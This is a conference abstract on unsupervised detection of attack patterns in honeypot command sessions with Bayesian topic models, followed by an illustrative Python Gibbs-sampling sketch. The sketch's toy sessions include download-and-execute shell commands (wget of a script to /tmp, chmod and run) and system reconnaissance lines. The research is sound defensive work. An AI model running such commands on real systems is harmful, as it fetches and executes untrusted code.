View Submission - EcoSta2023
A0229
Title: Unsupervised attack pattern detection in honeypot data using Bayesian topic modelling
Authors: Francesco Sanna Passino - Imperial College London (United Kingdom) [presenting]
Anastasia Mantziou - Imperial College London (United Kingdom)
Daniyar Ghani - Imperial College London (United Kingdom)
Philip Thiede - Imperial College London (United Kingdom)
Ross Bevington - Microsoft (United Kingdom)
Nick Heard - Imperial College London (United Kingdom)
Abstract: Cyber systems are under near-constant threat from intrusion attempts. Attack types vary, but each attempt typically has a specific underlying intent, and the perpetrators are usually groups of individuals with similar objectives. Clustering attacks that appear to share a common goal is therefore very valuable to threat-hunting experts. This work explores topic models for clustering terminal session commands collected from honeypots, which are special network hosts designed to entice malicious attackers. Clustering the sessions has two main practical uses: finding groups of similar attacks and identifying outliers. A range of statistical topic models is considered and adapted to the structure of command-line syntax. In particular, the concepts of primary and secondary topics, and of session-level and command-level topics, are introduced into the models to improve interpretability. The proposed methods are further extended in a Bayesian nonparametric fashion to allow an unbounded vocabulary size and an unbounded number of latent intents. The methods are shown to discover an unusual MIRAI variant that attempts to take over existing cryptocurrency coin-mining infrastructure, and which is not detected by traditional topic-modelling approaches.
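
To make the idea of a session-level topic concrete, the following is a minimal sketch and not the authors' model: it assumes a finite Dirichlet-multinomial mixture in which each session carries exactly one latent intent, fitted by collapsed Gibbs sampling. The function names (tokenize, cluster_sessions), the hyperparameters (alpha, eta), the splitting of commands on ";" and the toy sessions are all assumptions made for illustration. The primary and secondary topics, command-level topics and nonparametric extensions described in the abstract are not represented.

```python
import math
import random
from collections import Counter


def tokenize(session):
    # Assumption: commands are separated by ';' and words by whitespace.
    return [word for command in session.split(";") for word in command.split()]


def cluster_sessions(sessions, n_topics=2, alpha=1.0, eta=0.1, n_iter=50, seed=0):
    """Collapsed Gibbs sampler for a finite mixture of multinomials.

    Each session receives one topic label. alpha is the Dirichlet parameter
    on the topic proportions, eta the Dirichlet parameter on the per-topic
    word distributions (both hypothetical defaults).
    """
    rng = random.Random(seed)
    docs = [tokenize(s) for s in sessions]
    vocab_size = len({w for d in docs for w in d})

    # Random initial assignment and the corresponding count statistics.
    z = [rng.randrange(n_topics) for _ in docs]
    topic_sizes = [0] * n_topics                       # sessions per topic
    topic_words = [Counter() for _ in range(n_topics)]  # word counts per topic
    topic_totals = [0] * n_topics                      # total words per topic
    for d, k in zip(docs, z):
        topic_sizes[k] += 1
        topic_words[k].update(d)
        topic_totals[k] += len(d)

    for _ in range(n_iter):
        for i, d in enumerate(docs):
            # Remove session i from its current topic.
            k = z[i]
            topic_sizes[k] -= 1
            topic_words[k].subtract(d)
            topic_totals[k] -= len(d)

            # Log conditional probability of each topic for session i:
            # prior term plus the Dirichlet-multinomial predictive of its words.
            log_weights = []
            for t in range(n_topics):
                lp = math.log(topic_sizes[t] + alpha)
                seen = Counter()
                for j, w in enumerate(d):
                    lp += math.log(topic_words[t][w] + seen[w] + eta)
                    lp -= math.log(topic_totals[t] + j + vocab_size * eta)
                    seen[w] += 1
                log_weights.append(lp)

            # Sample a new topic, normalising in a numerically stable way.
            m = max(log_weights)
            weights = [math.exp(x - m) for x in log_weights]
            k = rng.choices(range(n_topics), weights=weights)[0]

            # Add session i back under its new topic.
            z[i] = k
            topic_sizes[k] += 1
            topic_words[k].update(d)
            topic_totals[k] += len(d)
    return z


if __name__ == "__main__":
    # Toy, invented sessions for illustration only (not real honeypot data).
    toy_sessions = [
        "cd /tmp; wget http://example.com/a.sh; chmod +x a.sh; sh a.sh",
        "cd /tmp; wget http://example.com/b.sh; chmod +x b.sh; sh b.sh",
        "uname -a; cat /proc/cpuinfo; free -m",
        "uname -a; cat /proc/cpuinfo; nproc",
    ]
    print(cluster_sessions(toy_sessions, n_topics=2, seed=1))
```

In a sketch of this kind, sessions whose label has very few members, or whose words have low predictive probability under every topic, would be natural candidates for the outliers mentioned in the abstract. The labels depend on the random seed and on the number of sampling iterations.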